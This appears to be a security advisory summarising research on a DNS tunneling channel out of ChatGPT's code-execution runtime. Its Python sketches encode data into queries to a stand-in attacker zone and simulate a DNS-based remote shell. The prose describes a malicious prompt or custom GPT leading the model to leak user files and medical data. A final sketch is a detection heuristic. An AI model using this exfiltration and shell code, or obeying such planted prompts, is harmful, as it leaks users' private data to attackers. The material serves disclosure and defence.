ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime

Check Point Research discovered a hidden DNS-based outbound channel from ChatGPT’s isolated code-execution runtime that could silently exfiltrate user messages, uploaded files, and model-generated outputs. A single malicious prompt or a backdoored custom GPT could exploit this channel to leak sensitive data and even establish a remote shell inside the Linux runtime. #ChatGPT #CheckPointResearch

Keypoints

  • Check Point Research found a covert outbound communication path from ChatGPT’s isolated code-execution/runtime environment that bypassed intended safeguards.
  • A single malicious prompt could convert an ordinary conversation into a persistent exfiltration channel, leaking user messages, uploaded files, and model outputs.
  • The exploit used DNS tunneling—encoding data into DNS queries and responses—to cross the isolation boundary despite blocked conventional outbound network access.
  • Malicious custom GPTs can embed the exploit directly in their instructions/files, making distribution and automatic exploitation easier for unsuspecting users.
  • A proof-of-concept “personal doctor” GPT exfiltrated patient identity and the model’s medical assessment from an uploaded PDF without user notification.
  • The same covert channel could be used bidirectionally to send commands into the runtime and receive results, effectively establishing a remote shell inside the Linux execution container.
  • OpenAI confirmed the issue and deployed a fix on February 20, 2026; the incident underscores the need to secure all outbound paths in AI execution environments, not just conventional network egress.
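To make the exfiltration mechanism concrete, the sketch below shows how conversation data can be smuggled out through ordinary DNS lookups: the payload is encoded into DNS-safe subdomain labels of an attacker-controlled zone and reassembled on the attacker's authoritative name server. This is a minimal illustration, not the researchers' actual exploit code; the zone name `c2.example.net`, the session/sequence prefix, and all function names are hypothetical.

```python
import base64

MAX_LABEL = 63  # RFC 1035: a single DNS label may be at most 63 characters
ZONE = "c2.example.net"  # hypothetical attacker-controlled zone

def encode_chunks(payload: bytes, max_label: int = MAX_LABEL) -> list[str]:
    # Base32 keeps labels DNS-safe and survives case folding by resolvers
    # (base64 would not); padding '=' is stripped because it is not label-safe.
    b32 = base64.b32encode(payload).decode().rstrip("=").lower()
    return [b32[i:i + max_label] for i in range(0, len(b32), max_label)]

def build_queries(payload: bytes, session: str = "s1",
                  per_query_labels: int = 2) -> list[str]:
    # Each query carries a sequence label so the attacker can reorder
    # fragments, since DNS gives no delivery-order guarantee.
    labels = encode_chunks(payload)
    queries = []
    for i in range(0, len(labels), per_query_labels):
        part = ".".join(labels[i:i + per_query_labels])
        queries.append(f"{session}-{i // per_query_labels}.{part}.{ZONE}")
    return queries

def decode_queries(queries: list[str]) -> bytes:
    # Attacker side: sort by sequence number, drop the sequence label and
    # the three-label zone, re-pad, and base32-decode.
    frags = []
    for q in sorted(queries, key=lambda q: int(q.split(".")[0].split("-")[1])):
        frags.append("".join(q.split(".")[1:-3]))
    b32 = "".join(frags).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))
```

Resolving the generated names (via any library or even a shell `nslookup` from the code runtime) is enough to deliver the payload: the recursive resolver forwards each query to the attacker's authoritative server for the zone, so no direct outbound connection is ever made.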

MITRE Techniques

  • [T1071] Application Layer Protocol – DNS was abused as a covert channel by encoding data into subdomain labels and using DNS resolution to carry queries/responses (‘The side channel that enabled both data exfiltration and remote command execution relied on DNS resolution.’)
  • [T1041] Exfiltration Over C2 Channel – Sensitive conversation content and extracted data were transmitted to an attacker-controlled endpoint via the covert channel (‘a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation.’)
  • [T1059] Command and Scripting Interpreter – The runtime’s ability to run code (Python-based Data Analysis environment) was leveraged to process encoded DNS responses and execute commands (‘commands executed through the side channel bypassed that mediation entirely.’)
  • [T1021] Remote Services – The attacker established an interactive remote shell inside the Linux execution environment, sending commands and receiving outputs outside the normal chat flow (‘it became possible to send commands into the container and receive the results back through the same path.’)
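The same channel works in reverse: commands can ride inbound on DNS answers (for example, data published in a record the attacker controls) and the results travel back as encoded subdomains, yielding a shell-like loop. The sketch below simulates that round trip with an in-memory stand-in for the resolver; the zone name, record name, and helpers are illustrative, not from the published research.

```python
import base64

def b32e(data: bytes) -> str:
    """Encode bytes into a DNS-label-safe base32 string."""
    return base64.b32encode(data).decode().rstrip("=").lower()

def b32d(text: str) -> bytes:
    """Reverse of b32e: restore padding and decode."""
    t = text.upper()
    return base64.b32decode(t + "=" * (-len(t) % 8))

# Attacker side: publish the next command as DNS answer data
# (e.g. the contents of a TXT record in the attacker's zone).
fake_zone = {"next-cmd.c2.example.net": b32e(b"cat /etc/hostname")}

def poll_command(resolve) -> bytes:
    # Inside the runtime: 'resolve' stands in for a DNS lookup,
    # which conventional outbound-traffic blocking does not stop.
    return b32d(resolve("next-cmd.c2.example.net"))

def report_output(output: bytes) -> str:
    # The command's output travels back out as an encoded subdomain
    # query against the attacker's zone.
    return f"{b32e(output)}.out.c2.example.net"
```

Polling such a record in a loop, executing what it decodes to, and reporting each result effectively gives the attacker an interactive remote shell inside the container, entirely outside the normal chat flow.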

Indicators of Compromise

  • [File] Uploaded document containing sensitive data – example: PDF with laboratory test results and patient identity (uploaded in the PoC); no exact filenames disclosed.
  • [Network/DNS queries] Covert DNS queries/subdomain labels – context: data encoded into DNS-safe fragments placed into subdomains and reconstructed by the attacker; example: encoded subdomain lookups carrying conversation summaries.
  • [Domain/Server] Attacker-controlled server/domain – context: destination receiving exfiltrated summaries and commands; example: “attacker-controlled server” (no specific domain provided).
  • [Custom GPT] Malicious GPT instance – context: custom GPT embedding the exploit (PoC: “personal doctor” GPT) used to exfiltrate user data.
  • [IPs / File hashes / Domains] None disclosed – the article does not include specific IP addresses, file hashes, or concrete domain names to list as IOCs.
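Because no concrete domains or hashes were disclosed, detection has to rely on the shape of the traffic rather than a blocklist. A common heuristic for DNS tunneling is to flag query names containing unusually long, information-dense labels. The sketch below is one such heuristic with illustrative thresholds, not vendor guidance or the researchers' detection logic.

```python
import math
from collections import Counter

def label_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of a single DNS label."""
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def looks_like_tunnel(qname: str, min_len: int = 32,
                      min_entropy: float = 2.5) -> bool:
    # Encoded payloads produce long labels with a wide character spread;
    # ordinary hostnames are short and low-entropy. Thresholds are
    # illustrative and would need tuning against real traffic.
    return any(len(label) >= min_len and label_entropy(label) >= min_entropy
               for label in qname.split("."))
```

Applied to resolver logs from an execution environment, a filter like this surfaces candidate tunneling queries for review; pairing it with per-client query-rate and unique-subdomain counts reduces false positives from CDNs and telemetry domains that also use long labels.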


Read more: https://research.checkpoint.com/2026/chatgpt-data-leakage-via-a-hidden-outbound-channel-in-the-code-execution-runtime/